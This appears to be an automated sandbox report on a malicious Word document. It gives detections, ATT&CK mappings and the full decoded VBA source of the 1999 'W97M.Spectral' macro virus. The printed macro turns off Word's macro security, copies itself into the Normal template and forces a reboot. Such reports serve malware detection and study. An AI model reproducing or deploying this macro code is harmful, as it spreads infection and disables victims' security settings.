MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that executes upon opening the document. This macro attempts to export its own code to 'C:\Av.log' and then import it into the Normal template, indicating an attempt to establish persistence or load additional functionality. The presence of ShellExecute API calls and the ClamAV detection of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Spectral-1' strongly suggest malicious intent, likely to download and execute a second-stage payload.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer Private Sub Document_Open() ' W97M.Spectral by Draconia
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3700 bytes |
SHA-256: 6a17eb67f5a478ec2f3ffc3df94d4e10716df5b9f332542bf9ac8c7ed9937286 |
|||
|
Detection
ClamAV:
Doc.Trojan.Spectral-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare Function ExitWindowsEx Lib "User32" (ByVal fuOptions As Integer, ByVal Reserved As Integer) As Boolean
Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Integer, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal lpszDir As String, ByVal wShowCmd As Integer) As Integer
Private Sub Document_Open()
' W97M.Spectral by Draconia
' Member of Virus Quest
' Copyright@1999
On Error GoTo ErrorDcOe:
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
iMacroNormalDotCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalDotCount
If NormalTemplate.VBProject.VBComponents(i).Name = "Spectral" Then
DropScreamInstalled = -1
End If
Next i
If Not SpectralInstalled Then
ActiveDocument.VBProject.VBComponents("Spectral").Export "C:\Av.log"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
NormalTemplate.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") <> "Yes" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SpectralInstalled") = "Yes"
Call Payload
End If
Else
iMacroActiveDctCount = ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroActiveDctCount
If ActiveDocument.VBProject.VBComponents(i).Name = "Spectral" Then
DropScreamDocInstalled = -1
End If
Next i
If Not SpecDocInstalled Then
NormalTemplate.VBProject.VBComponents("Spectral").Export "C:\Av.log"
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Av.log"
ActiveDocument.VBProject.VBComponents("Spectral").CodeModule.DeleteLines 1, 4
ActiveDocument.Save
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Tips:"
.Text = "Get yourself a good quality Anti-Virus software!" & Chr(13) & "Thanks to F-Prot, AVP, NAV, McAffee, Dr Solomon!!!"
.Show
End With
End If
End If
ErrorDcOe:
End Sub
Private Sub Payload()
On Error GoTo ErrorPDSc
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Const EWX_REBOOT As Integer = 2
Assistant.Visible = True
With Assistant.NewBalloon
.Button = msoButtonSetOK
.Heading = "Microsoft Word"
.Text = "Important:" & Chr(13) & "Becareful, you must reboot your PC, now! I'm outta here!"
.Show
End With
ExitWindowsEx EWX_REBOOT, 0
ErrorPDSc:
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.